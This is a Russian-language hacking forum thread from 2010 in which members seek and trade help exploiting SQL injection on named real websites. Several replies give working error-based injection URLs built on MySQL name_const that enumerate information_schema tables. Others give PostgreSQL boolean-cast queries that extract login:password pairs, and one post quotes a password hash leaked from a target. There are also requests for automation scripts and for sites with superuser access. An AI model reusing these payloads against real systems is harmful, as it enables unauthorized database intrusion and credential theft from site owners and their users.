Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Направляете мышкой на ссылку, зажимаете левую кнопку и тянете пока не выделиться вся ссылка. Потом, нажимаете пальцами на клавиатуре сочитание клавиш, сначала "ctrl", потом не отпуская "ctrl" (понимаю это трудно, но что делать) нажимаете кнопочку "c" и в адресной строке браузера нажимаете "ctrl"+"v", далее жмякаете enter и вуаля вы внутри сайта. Если что непонятно, пишите в пм, объясню подробно.
    зы. Надеюсь помог.
     
  2. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Очень смешно...

    Если не трудно помогите раскрутить.
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    там int или intval скорее всего, просто нет проверки на "-", то бишь вряд ли там (конкретно по этой ссылке) есть скуля
     
  4. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а 4то зделать в таком ситуации ??
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.bombardier.cv.ua/boat2.php?id_boat2=(select*from(select+name_const(version(),1),name_const(version(),1))a)
    
     
  6. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    вроде еррор есть но дальше ничего... что можно придумать?
     
  7. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Где "еррор"? Отображается до кавычки и после одинаково.
     
  8. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Подскажите с конструкцией типа:
    выдает логин
    неверный входной синтаксис для типа boolean: "$1$rTat6wug$Qvx2HyTZNNKWYJnmszCP31" in /usr/ и т.д
    т.е выдает только пароль
    ----------------
    Как вывести информацию в виде login:passwd?

    И подскажите скрипт для перебора limit offset с аутентификацией и работой с https? если таковой имеется
     
  9. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Warning: Invalid argument supplied for foreach() in /usr/home/krutomer/krutomer.ru/html/city.php on line 301

    в опере отображается а вот в мозилле нет )
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    разобраться в чем? в конструкции нового самолета компании?
     
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    samarin
    Пробуй с подзапросами, тогда лимит должен работать
    select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean
     
    2 people like this.
  12. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    о4ень спасибо ну моjэт подробнее ??

    a vot zdes ??

    http://www.aspik.am/index.php?p=-5+union+select+1
     
    #11432 LokbatanLi, 16 Feb 2010
    Last edited: 16 Feb 2010
  13. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Например, так
    Code:
    select (login||chr(58)||passwd)::text::boolean from (select passwd,login from logins limit 1 offset 1)q;----
    
    или так
    Code:
    select a::text::boolean from (select (login||chr(58)||passwd) as a from logins limit 1 offset 1)q;----
    
     
  14. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    krypt3r
    Спасибо! Вы как всегда на высоте :)
    Spyder
    Тоже спасибо! Это мы уже с krypt3r-ом разобрали.

    Вот бы скриптик, для автоматического перебора оффсета, с авторизацией и https и я бы от всех отстал (можетбыть...) :)

    И подкиньте сайтик, может у кого завалялся, с доступом к usesuper для образовательных целей
     
    #11434 samarin, 16 Feb 2010
    Last edited: 16 Feb 2010
  15. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Помогите здесь скулю раскрутить:
    http://zub.by/menu.php?form_id=1
    Ввожу количество полей и всегда ошибка.
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://zub.by/menu.php?form_id=(select*from(select+name_const(version(),1),name_const(version(),1))a)
    
     
    1 person likes this.
  17. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Pashkela У меня ошибка при таком вводе :(
    А зависит ли это от браузера?
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Правильно, ошибка, ты ошибку-то почитай
    (5.0.51a-24)

    PS: От версии браузера не зависит

    Code:
    http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)
    
    
    http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+1,1),1),name_const((select+table_name+from+information_schema.tables+limit+1,1),1))a)
    
    .....
    
     
    #11438 Pashkela, 17 Feb 2010
    Last edited: 17 Feb 2010
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    У меня ничего подобного, вот смотри, что у меня:

     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты :D

    Сам подумай, откуда в url могут быть ПРОБЕЛЫ
     
    1 person likes this.
Thread Status:
Not open for further replies.